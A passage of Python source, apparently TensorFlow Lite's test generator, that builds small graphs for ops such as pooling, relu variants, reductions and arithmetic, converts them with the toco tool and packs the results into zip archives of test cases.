dtype=tf.float32, name="input", shape=parameters["input_shape"])
filter_value = tf.zeros((3, 3, TEST_INPUT_DEPTH, 8), tf.float32)
assert_op = tf.assert_greater_equal(input_tensor, input_tensor - 1)
with tf.control_dependencies([assert_op]):
out = tf.nn.conv2d(input_tensor, filter_value,
strides=(1, 1, 1, 1), padding="SAME")
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(tf.float32, parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
extra_toco_options = ExtraTocoOptions()
extra_toco_options.drop_control_dependency = True
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
extra_toco_options,
expected_tf_failures=3)
def toco_convert(
options, graph_def, input_tensors, output_tensors, **kwargs):
"""Convert a model's graph def into a tflite model.
NOTE: this currently shells out to the toco binary, but we would like
convert to Python API tooling in the future.
Args:
options: An Options instance.
graph_def: A GraphDef object.
input_tensors: List of input tensor tuples `(name, shape, type)`.
output_tensors: List of output tensors (names).
**kwargs: Extra options to be passed.
Returns:
output tflite model, log_txt from conversion
or None, log_txt if it did not convert properly.
"""
# Convert ophint ops if presented.
graph_def = tf.lite.experimental.convert_op_hints_to_stubs(
graph_def=graph_def)
graph_def_str = graph_def.SerializeToString()
extra_toco_options = kwargs.get("extra_toco_options", ExtraTocoOptions())
input_arrays = [x[0] for x in input_tensors]
data_types = [_TF_TYPE_INFO[x[2]][1] for x in input_tensors]
opts = toco_options(
data_types=data_types,
input_arrays=input_arrays,
shapes=[x[1] for x in input_tensors],
output_arrays=output_tensors,
extra_toco_options=extra_toco_options)
with tempfile.NamedTemporaryFile() as graphdef_file, \
tempfile.NamedTemporaryFile() as output_file, \
tempfile.NamedTemporaryFile("w+") as stdout_file:
graphdef_file.write(graph_def_str)
graphdef_file.flush()
# TODO(aselle): Switch this to subprocess at some point.
if "pb2lite" in bin_path and options.run_with_flex:
opts = ("--input_arrays={0} --output_arrays={1}".format(
",".join(input_arrays), ",".join(output_tensors)))
elif options.run_with_flex:
opts += " --enable_select_tf_ops --force_select_tf_ops"
cmd = ("%s --input_file=%s --output_file=%s %s > %s 2>&1" %
(bin_path, graphdef_file.name, output_file.name, opts,
stdout_file.name))
exit_code = os.system(cmd)
log = (
cmd + "exited with code %d" % exit_code + "\n------------------\n" +
stdout_file.read())
return (None if exit_code != 0 else output_file.read()), log
def normalize_output_name(output_name):
"""Remove :0 suffix from tensor names."""
return output_name.split(":")[0] if output_name.endswith(
":0") else output_name
# How many test cases we may have in a zip file. Too many test cases will
# slow down the test data generation process.
_MAX_TESTS_PER_ZIP = 500
def make_zip_of_tests(options,
test_parameters,
make_graph,
make_test_inputs,
extra_toco_options=ExtraTocoOptions(),
use_frozen_graph=False,
expected_tf_failures=0):
"""Helper to make a zip file of a bunch of TensorFlow models.
This does a cartestian product of the dictionary of test_parameters and
calls make_graph() for each item in the cartestian product set.
If the graph is built successfully, then make_test_inputs() is called to
build expected input/output value pairs. The model is then converted to tflite
with toco, and the examples are serialized with the tflite model into a zip
file (2 files per item in the cartesian product set).
Args:
options: An Options instance.
test_parameters: Dictionary mapping to lists for each parameter.
e.g. `{"strides": [[1,3,3,1], [1,2,2,1]], "foo": [1.2, 1.3]}`
make_graph: function that takes current parameters and returns tuple
`[input1, input2, ...], [output1, output2, ...]`
make_test_inputs: function taking `curr_params`, `session`, `input_tensors`,
`output_tensors` and returns tuple `(input_values, output_values)`.
extra_toco_options: Additional toco options.
use_frozen_graph: Whether or not freeze graph before toco converter.
expected_tf_failures: Number of times tensorflow is expected to fail in
executing the input graphs. In some cases it is OK for TensorFlow to
fail because the one or more combination of parameters is invalid.
Raises:
RuntimeError: if there are toco errors that can't be ignored.
"""
zip_path = os.path.join(options.output_path, options.zip_to_output)
parameter_count = 0
for parameters in test_parameters:
parameter_count += functools.reduce(
operator.mul, [len(values) for values in parameters.values()])
if parameter_count > _MAX_TESTS_PER_ZIP:
raise RuntimeError(
"Too many parameter combinations for generating '%s'.\n"
"There are %d combinations while the upper limit is %d.\n"
"Having too many combinations will slow down the tests.\n"
"Please consider splitting the test into multiple functions.\n"
% (zip_path, parameter_count, _MAX_TESTS_PER_ZIP))
# TODO(aselle): Make this allow multiple inputs outputs.
archive = zipfile.PyZipFile(zip_path, "w")
zip_manifest = []
convert_report = []
toco_errors = 0
processed_labels = set()
for parameters in test_parameters:
keys = parameters.keys()
for curr in itertools.product(*parameters.values()):
label = zip_path.replace(".zip", "_") + (",".join(
"%s=%r" % z for z in sorted(zip(keys, curr))).replace(" ", ""))
if label[0] == "/":
label = label[1:]
if label in processed_labels:
# Do not populate data for the same label more than once. It will cause
# errors when unzipping.
continue
processed_labels.add(label)
param_dict = dict(zip(keys, curr))
def build_example(label, param_dict_real):
"""Build the model with parameter values set in param_dict_real.
Args:
label: Label of the model (i.e. the filename in the zip).
param_dict_real: Parameter dictionary (arguments to the factories
make_graph and make_test_inputs)
Returns:
(tflite_model_binary, report) where tflite_model_binary is the
serialized flatbuffer as a string and report is a dictionary with
keys `toco_log` (log of toco conversion), `tf_log` (log of tf
conversion), `toco` (a string of success status of the conversion),
`tf` (a string success status of the conversion).
"""
np.random.seed(RANDOM_SEED)
report = {"toco": report_lib.NOTRUN, "tf": report_lib.FAILED}
# Build graph
report["tf_log"] = ""
report["toco_log"] = ""
tf.reset_default_graph()
with tf.device("/cpu:0"):
try:
inputs, outputs = make_graph(param_dict_real)
except (tf.errors.UnimplementedError, tf.errors.InvalidArgumentError,
ValueError):
report["tf_log"] += traceback.format_exc()
return None, report
sess = tf.Session()
try:
baseline_inputs, baseline_outputs = (make_test_inputs(
param_dict_real, sess, inputs, outputs))
except (tf.errors.UnimplementedError, tf.errors.InvalidArgumentError,
ValueError):
report["tf_log"] += traceback.format_exc()
return None, report
report["toco"] = report_lib.FAILED
report["tf"] = report_lib.SUCCESS
# Convert graph to toco
input_tensors = [(input_tensor.name.split(":")[0], input_tensor.shape,
input_tensor.dtype) for input_tensor in inputs]
output_tensors = [normalize_output_name(out.name) for out in outputs]
graph_def = freeze_graph(
sess,
tf.global_variables() + inputs +
outputs) if use_frozen_graph else sess.graph_def
if "split_tflite_lstm_inputs" in param_dict_real:
extra_toco_options.split_tflite_lstm_inputs = param_dict_real[
"split_tflite_lstm_inputs"]
tflite_model_binary, toco_log = options.tflite_convert_function(
options, graph_def, input_tensors,
output_tensors, extra_toco_options=extra_toco_options)
report["toco"] = (report_lib.SUCCESS if tflite_model_binary is not None
else report_lib.FAILED)
report["toco_log"] = toco_log
if True or options.save_graphdefs:
archive.writestr(label + ".pbtxt",
text_format.MessageToString(graph_def),
zipfile.ZIP_DEFLATED)
if tflite_model_binary:
archive.writestr(label + ".bin", tflite_model_binary,
zipfile.ZIP_DEFLATED)
example = {"inputs": baseline_inputs, "outputs": baseline_outputs}
example_fp = StringIO()
write_examples(example_fp, [example])
archive.writestr(label + ".inputs",
example_fp.getvalue(), zipfile.ZIP_DEFLATED)
example_fp2 = StringIO()
write_test_cases(example_fp2, label + ".bin", [example])
archive.writestr(label + "_tests.txt",
example_fp2.getvalue(), zipfile.ZIP_DEFLATED)
zip_manifest.append(label + "\n")
return tflite_model_binary, report
_, report = build_example(label, param_dict)
if report["toco"] == report_lib.FAILED:
ignore_error = False
if not options.known_bugs_are_errors:
for pattern, bug_number in options.known_bugs.items():
if re.search(pattern, label):
print("Ignored TOCO error due to bug %s" % bug_number)
ignore_error = True
if not ignore_error:
toco_errors += 1
print("-----------------\ntoco error!\n%s\n-----------------\n" %
report["toco_log"])
convert_report.append((param_dict, report))
report_io = StringIO()
report_lib.make_report_table(report_io, zip_path, convert_report)
archive.writestr("report.html", report_io.getvalue())
archive.writestr("manifest.txt", "".join(zip_manifest), zipfile.ZIP_DEFLATED)
# Log statistics of what succeeded
total_conversions = len(convert_report)
tf_success = sum(1 for x in convert_report
if x[1]["tf"] == report_lib.SUCCESS)
toco_success = sum(1 for x in convert_report
if x[1]["toco"] == report_lib.SUCCESS)
percent = 0
if tf_success > 0:
percent = float(toco_success) / float(tf_success) * 100.
tf.logging.info(("Archive %s Considered %d graphs, %d TF evaluated graphs "
" and %d TOCO converted graphs (%.1f%%"), zip_path,
total_conversions, tf_success, toco_success, percent)
tf_failures = parameter_count - tf_success
if tf_failures / parameter_count > 0.8:
raise RuntimeError(("Test for '%s' is not very useful. "
"TensorFlow fails in %d percent of the cases.") %
(zip_path, int(100 * tf_failures / parameter_count)))
if tf_failures != expected_tf_failures:
raise RuntimeError(("Expected TF to fail %d times while generating '%s', "
"but that happened %d times") % (expected_tf_failures,
zip_path, tf_failures))
if not options.ignore_converter_errors and toco_errors > 0:
raise RuntimeError(
"Found %d errors while generating toco models" % toco_errors)
def make_pool_tests(pool_op_in):
"""Make a set of tests to do average pooling.
Args:
pool_op_in: TensorFlow pooling operation to test i.e. `tf.nn.avg_pool2d`.
Returns:
A function representing the true generator (after curried pool_op_in).
"""
pool_op = pool_op_in
def f(options, expected_tf_failures=0):
"""Actual function that generates examples.
Args:
options: An Options instance.
expected_tf_failures: number of expected tensorflow failures.
"""
# Chose a set of parameters
test_parameters = [{
"ksize": [[2, 1, 1, 2], [1, 1, 1, 1], [1, 1, 2, 1], [1, 10, 11, 1]],
"strides": [[2, 1, 1, 2], [1, 1, 1, 1], [1, 1, 2, 1], [1, 10, 11, 1]],
# TODO(aselle): should add in a degenerate shape (e.g. [1, 0, 1, 1]).
"input_shape": [[], [1, 1, 1, 1], [1, 15, 14, 1], [3, 15, 14, 3]],
"padding": ["SAME", "VALID"],
"data_format": ["NHWC"], # TODO(aselle): NCHW would be good
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = pool_op(
input_tensor,
ksize=parameters["ksize"],
strides=parameters["strides"],
data_format=parameters["data_format"],
padding=parameters["padding"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(tf.float32, parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=expected_tf_failures)
return f
@register_make_test_function()
def make_l2_pool_tests(options):
make_pool_tests(make_l2_pool)(options, expected_tf_failures=80)
@register_make_test_function()
def make_avg_pool_tests(options):
make_pool_tests(tf.nn.avg_pool)(options, expected_tf_failures=80)
@register_make_test_function()
def make_max_pool_tests(options):
make_pool_tests(tf.nn.max_pool)(options, expected_tf_failures=80)
@register_make_test_function()
def make_abs_tests(options):
"""Make a set of tests to do relu."""
# Chose a set of parameters
test_parameters = [{
"input_shape": [[], [1], [2, 3], [1, 1, 1, 1], [1, 3, 4, 3],
[3, 15, 14, 3], [3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.abs(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-10, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_elu_tests(options):
"""Make a set of tests to do (float) tf.nn.elu."""
test_parameters = [
{
"input_shape": [[], [1], [2, 3], [1, 1, 1, 1], [1, 3, 4, 3],
[3, 15, 14, 3], [3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
},
]
def build_graph(parameters):
"""Build the graph for the test case."""
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.nn.elu(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Build the inputs for the test case."""
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_identity_tests(options):
"""Make a set of tests to do identity."""
# Chose a set of parameters
test_parameters = [{
"input_shape": [[], [1], [3, 3]],
"use_snapshot": [False, True],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
# We add the Multiply before Identity just as a walk-around to make the test
# pass when input_shape is scalar.
# During graph transformation, TOCO will replace the Identity op with
# Reshape when input has shape. However, currently TOCO can't distinguish
# between missing shape and scalar shape. As a result, when input has scalar
# shape, this conversion still fails.
# TODO(b/129197312), remove the walk-around code once the bug is fixed.
input_doubled = input_tensor * 2.0
if parameters["use_snapshot"]:
identity_output = array_ops.snapshot(input_doubled)
else:
identity_output = tf.identity(input_doubled)
return [input_tensor], [identity_output]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_relu_tests(options):
"""Make a set of tests to do relu."""
# Chose a set of parameters
test_parameters = [{
"input_shape": [[], [1], [2, 3], [1, 1, 1, 1], [1, 3, 4, 3],
[3, 15, 14, 3], [3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.nn.relu(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_relu1_tests(options):
"""Make a set of tests to do relu1."""
# Chose a set of parameters
test_parameters = [{
"input_shape": [[], [1, 1, 1, 1], [1, 3, 4, 3], [3, 15, 14, 3],
[3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
# Note that the following is not supported:
# out = tf.maximum(-1.0, tf.minimum(input_tensor, 1.0))
out = tf.minimum(1.0, tf.maximum(input_tensor, -1.0))
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-3, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_relu6_tests(options):
"""Make a set of tests to do relu6."""
# Chose a set of parameters
test_parameters = [{
"input_shape": [[], [1, 1, 1, 1], [1, 3, 4, 3], [3, 15, 14, 3],
[3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.nn.relu(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-3, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_prelu_tests(options):
"""Make a set of tests to do PReLU."""
test_parameters = [
{
# The canonical case for image processing is having a 4D `input`
# (NHWC)and `shared_axes`=[1, 2], so the alpha parameter is per
# channel.
"input_shape": [[1, 10, 10, 3], [3, 3, 3, 3]],
"shared_axes": [[1, 2], [1]],
},
{
# 2D-3D example. Share the 2nd axis.
"input_shape": [[20, 20], [20, 20, 20]],
"shared_axes": [[1]],
}
]
def build_graph(parameters):
"""Build the graph for the test case."""
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
prelu = tf.keras.layers.PReLU(shared_axes=parameters["shared_axes"])
out = prelu(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Build the inputs for the test case."""
input_shape = parameters["input_shape"]
input_values = create_tensor_data(
np.float32, input_shape, min_value=-10, max_value=10)
shared_axes = parameters["shared_axes"]
alpha_shape = []
for dim in range(1, len(input_shape)):
alpha_shape.append(1 if dim in shared_axes else input_shape[dim])
alpha_values = create_tensor_data(np.float32, alpha_shape)
# There should be only 1 trainable variable tensor.
variables = tf.all_variables()
assert len(variables) == 1
sess.run(variables[0].assign(alpha_values))
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
use_frozen_graph=True)
@register_make_test_function()
def make_leaky_relu_tests(options):
"""Make a set of tests to do LeakyRelu."""
test_parameters = [
{
"input_shape": [[], [1], [5], [1, 10, 10, 3], [3, 3, 3, 3]],
"alpha": [0.1, 1.0, 2.0, -0.1, -1.0, -2.0],
},
]
def build_graph(parameters):
"""Build the graph for the test case."""
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.nn.leaky_relu(input_tensor, alpha=parameters["alpha"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Build the inputs for the test case."""
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-3, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
# This function tests various TensorFLow functions that generates Const op,
# including `tf.ones`, `tf.zeros` and random functions.
@register_make_test_function()
def make_constant_tests(options):
"""Make a set of tests to do constant ops."""
test_parameters = [{
"dtype": [tf.float32, tf.int32],
"input_shape": [[], [1], [2], [1, 1, 1, 1], [2, 2, 2, 2]],
"constant_is_also_output": [True, False],
# This is a regression test for a bug where Toco rejects models with
# unread inputs.
"has_unread_input": [True, False],
}]
def build_graph(parameters):
dummy_input = tf.placeholder(
dtype=parameters["dtype"],
name="input1",
shape=parameters["input_shape"])
constant = tf.constant(
create_tensor_data(parameters["dtype"], parameters["input_shape"]))
outputs = [tf.maximum(dummy_input, constant)]
if parameters["constant_is_also_output"]:
outputs.append(constant)
inputs = [dummy_input]
if parameters["has_unread_input"]:
unread_input = tf.placeholder(
dtype=parameters["dtype"],
name="unread_input",
shape=parameters["input_shape"])
inputs.append(unread_input)
return inputs, outputs
def build_inputs(parameters, sess, inputs, outputs):
dummy_input = np.zeros(
parameters["input_shape"], dtype=_TF_TYPE_INFO[parameters["dtype"]][0])
return [dummy_input], sess.run(outputs, feed_dict={inputs[0]: dummy_input})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
def make_binary_op_tests(options, binary_operator, expected_tf_failures=0):
"""Make a set of tests to do binary ops with and without broadcast."""
test_parameters = [
# Avoid creating all combinations to keep the test size small.
{
"dtype": [tf.float32, tf.int32],
"input_shape_1": [[1, 3, 4, 3]],
"input_shape_2": [[1, 3, 4, 3]],
"activation": [True],
},
{
"dtype": [tf.float32],
"input_shape_1": [[5]],
"input_shape_2": [[5]],
"activation": [False, True],
},
{
"dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_1": [[1, 3, 4, 3]],
"input_shape_2": [[3]],
"activation": [True, False],
},
{
"dtype": [tf.float32, tf.int32],
"input_shape_1": [[3]],
"input_shape_2": [[1, 3, 4, 3]],
"activation": [True, False],
},
{
"dtype": [tf.float32],
"input_shape_1": [[]],
"input_shape_2": [[]],
"activation": [False],
},
{
"dtype": [tf.float32],
"input_shape_1": [[0]],
"input_shape_2": [[1]],
"activation": [False],
}
]
def build_graph(parameters):
"""Builds the graph given the current parameters."""
input1 = tf.placeholder(
dtype=parameters["dtype"],
name="input1",
shape=parameters["input_shape_1"])
input2 = tf.placeholder(
dtype=parameters["dtype"],
name="input2",
shape=parameters["input_shape_2"])
out = binary_operator(input1, input2)
if parameters["activation"]:
out = tf.nn.relu(out)
return [input1, input2], [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Builds operand inputs for op."""
input1 = create_tensor_data(parameters["dtype"],
parameters["input_shape_1"])
input2 = create_tensor_data(parameters["dtype"],
parameters["input_shape_2"])
return [input1, input2], sess.run(
outputs, feed_dict={
inputs[0]: input1,
inputs[1]: input2
})
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=expected_tf_failures)
def make_reduce_tests(reduce_op,
min_value=-10,
max_value=10,
boolean_tensor_only=False):
"""Make a set of tests to do reduce operation.
Args:
reduce_op: TensorFlow reduce operation to test, i.e. `tf.reduce_mean`.
min_value: min value for created tensor data.
max_value: max value for created tensor data.
boolean_tensor_only: If true, will only generate tensor with boolean value.
Returns:
a function representing the true generator with `reduce_op_in` curried.
"""
def f(options):
"""Actual function that generates examples."""
test_parameters = [
{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape": [[3, 3, 2, 4]],
"axis": [
0, 1, 2, [0, 1], [0, 2], [1, 2], [0, 1, 2], [1, 0], [2, 0],
[2, 1], [2, 1, 0], [2, 0, 1], -1, -2, -3, [1, -1], [0, -1],
[-1, 0], [-1, -2, -3], [0, 0, 0], [2, 2, 0], [1, 0, -3, -3]
],
"const_axis": [True, False],
"keepdims": [True, False],
},
{
"input_dtype": [tf.float32],
"input_shape": [[1, 8, 8, 3]],
"axis": [
0, 1, 2, 3, [1, 2], [0, 3], [1, 2, 3], [0, 1, 2,
3], [3, 2, 1, 0],
[3, 1, 0, 2], [2, 0], [3, 0], [3, 1], [1, 0], -1, -2, -3, -4,
[0, -2], [2, 3, -1, 0], [3, 1, 2, -3], [3, -4], [2, 2, 2],
[2, 2, 3], [-3, -3, -4], [-3, 2, 1]
],
"const_axis": [True, False],
"keepdims": [True, False],
},
{
"input_dtype": [tf.float32],
"input_shape": [[], [1, 8, 8, 3], [3, 2, 4]],
"axis": [[]], # shape is: [0]
"const_axis": [False],
"keepdims": [True, False],
},
{
"input_dtype": [tf.float32],
"input_shape": [[], [1, 8, 8, 3], [3, 2, 4]],
"axis": [None], # shape is: []
"const_axis": [True],
"keepdims": [True, False],
}
]
def build_graph(parameters):
"""Build the mean op testing graph."""
dtype = parameters["input_dtype"]
if boolean_tensor_only:
dtype = tf.bool
input_tensor = tf.placeholder(
dtype=dtype, name="input", shape=parameters["input_shape"])
# Get axis as either a placeholder or constants.
if parameters["const_axis"]:
axis = parameters["axis"]
input_tensors = [input_tensor]
else:
if isinstance(parameters["axis"], list):
shape = [len(parameters["axis"])]
else:
shape = [] # shape for None or integers.
axis = tf.placeholder(dtype=tf.int32, name="axis", shape=shape)
input_tensors = [input_tensor, axis]
out = reduce_op(
input_tensor, axis=axis, keepdims=parameters["keepdims"])
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
dtype = parameters["input_dtype"]
if boolean_tensor_only:
dtype = tf.bool
values = [
create_tensor_data(
dtype,
parameters["input_shape"],
min_value=min_value,
max_value=max_value)
]
if not parameters["const_axis"]:
values.append(np.array(parameters["axis"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
return f
@register_make_test_function()
def make_mean_tests(options):
"""Make a set of tests to do mean."""
return make_reduce_tests(tf.reduce_mean)(options)
@register_make_test_function()
def make_sum_tests(options):
"""Make a set of tests to do sum."""
return make_reduce_tests(tf.reduce_sum)(options)
@register_make_test_function()
def make_reduce_prod_tests(options):
"""Make a set of tests to do prod."""
# set min max value to be -2, 2 to avoid overflow.
return make_reduce_tests(tf.reduce_prod, -2, 2)(options)
@register_make_test_function()
def make_reduce_max_tests(options):
"""Make a set of tests to do max."""
return make_reduce_tests(tf.reduce_max)(options)
@register_make_test_function()
def make_reduce_min_tests(options):
"""Make a set of tests to do min."""
return make_reduce_tests(tf.reduce_min)(options)
@register_make_test_function()
def make_reduce_any_tests(options):
"""Make a set of tests to do any."""
return make_reduce_tests(tf.reduce_any, boolean_tensor_only=True)(options)
@register_make_test_function()
def make_exp_tests(options):
"""Make a set of tests to do exp."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
}]
def build_graph(parameters):
"""Build the exp op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.exp(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["input_dtype"], parameters["input_shape"],
min_value=-100, max_value=9)
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_cos_tests(options):
"""Make a set of tests to do cos."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
}]
def build_graph(parameters):
"""Build the cos op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.cos(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["input_dtype"], parameters["input_shape"],
min_value=-np.pi, max_value=np.pi)
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_log_softmax_tests(options):
"""Make a set of tests to do log_softmax."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[1, 100], [4, 2], [5, 224]],
}]
def build_graph(parameters):
"""Build the log_softmax op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.nn.log_softmax(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(
parameters["input_dtype"],
parameters["input_shape"],
min_value=-100,
max_value=9)
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_maximum_tests(options):
"""Make a set of tests to do maximum."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape_1": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
"input_shape_2": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
}]
def build_graph(parameters):
"""Build the maximum op testing graph."""
input_tensor_1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input_1",
shape=parameters["input_shape_1"])
input_tensor_2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input_2",
shape=parameters["input_shape_2"])
out = tf.maximum(input_tensor_1, input_tensor_2)
return [input_tensor_1, input_tensor_2], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["input_dtype"],
parameters["input_shape_1"]),
create_tensor_data(parameters["input_dtype"],
parameters["input_shape_2"])
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=8)
@register_make_test_function()
def make_minimum_tests(options):
"""Make a set of tests to do minimum."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape_1": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
"input_shape_2": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
}]
def build_graph(parameters):
"""Build the minimum op testing graph."""
input_tensor_1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input_1",
shape=parameters["input_shape_1"])
input_tensor_2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input_2",
shape=parameters["input_shape_2"])
out = tf.minimum(input_tensor_1, input_tensor_2)
return [input_tensor_1, input_tensor_2], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["input_dtype"],
parameters["input_shape_1"]),
create_tensor_data(parameters["input_dtype"],
parameters["input_shape_2"])
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=8)
def make_binary_op_tests_func(binary_operator):
"""Return a function that does a test on a binary operator."""
return lambda options: make_binary_op_tests(options, binary_operator)
@register_make_test_function()
def make_add_tests(options):
make_binary_op_tests(options, tf.add)
@register_make_test_function()
def make_add_n_tests(options):
"""Make a set of tests for AddN op."""
test_parameters = [
{
"dtype": [tf.float32, tf.int32],
"input_shape": [[2, 5, 3, 1]],
"num_inputs": [2, 3, 4, 5],
},
{
"dtype": [tf.float32, tf.int32],
"input_shape": [[5]],
"num_inputs": [2, 3, 4, 5],
},
{
"dtype": [tf.float32, tf.int32],
"input_shape": [[]],
"num_inputs": [2, 3, 4, 5],
},
]
def build_graph(parameters):
"""Builds the graph given the current parameters."""
input_tensors = []
for i in range(parameters["num_inputs"]):
input_tensors.append(
tf.placeholder(
dtype=parameters["dtype"],
name="input_{}".format(i),
shape=parameters["input_shape"]))
out = tf.add_n(input_tensors)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Builds operand inputs for op."""
input_data = []
for i in range(parameters["num_inputs"]):
input_data.append(
create_tensor_data(parameters["dtype"], parameters["input_shape"]))
return input_data, sess.run(
outputs, feed_dict={i: d for i, d in zip(inputs, input_data)})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_div_tests(options):
make_binary_op_tests(options, tf.div)
@register_make_test_function()
def make_sub_tests(options):
make_binary_op_tests(options, tf.subtract)
@register_make_test_function()
def make_mul_tests(options):
make_binary_op_tests(options, tf.multiply)
@register_make_test_function()
def make_pow_tests(options):
